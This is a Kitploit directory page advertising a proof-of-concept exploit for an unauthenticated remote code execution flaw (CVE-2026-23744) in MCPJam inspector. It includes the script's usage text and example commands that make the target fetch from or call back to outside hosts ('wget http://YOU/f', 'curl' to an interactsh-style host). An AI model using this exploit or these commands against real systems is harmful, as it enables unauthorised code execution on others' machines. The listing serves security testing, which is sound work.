Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
mcpjaminspector-unauth-rce — Proof-of-concept exploit for CVE-2026-23744, an unauthenticated remote code execution in MCPJam inspector <= 1.4.2, allowing command execution on vulnerable targets. | Kitploit
Tools/GitHubGitHub/fckoo/mcpjaminspector-unauth-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubfckoo/mcpjaminspector-unauth-rce

mcpjaminspector-unauth-rce

Proof-of-concept exploit for CVE-2026-23744, an unauthenticated remote code execution in MCPJam inspector <= 1.4.2, allowing command execution on vulnerable targets.

View Repository
25 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

mcpjaminspector-unauth-rce

CVE-2026-23744

RCE in MCPJam inspector <= 1.4.2

Vulnerability details

https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6

Usage

root@kitploit:~
usage: mcpjaminspector-unauth-rce.py [-h] --target TARGET --command COMMAND

options:
  -h, --help         show this help message and exit
  --target TARGET    Target e.g https://127.0.0.1
  --command COMMAND  Command to exec on remote target. e.g: wget http://YOU/f
root@kitploit:~
python3 mcpjaminspector-unauth-rce.py --target "http://mymcp.local/" --command "curl http://myinteractsh.local/test"
Download Tool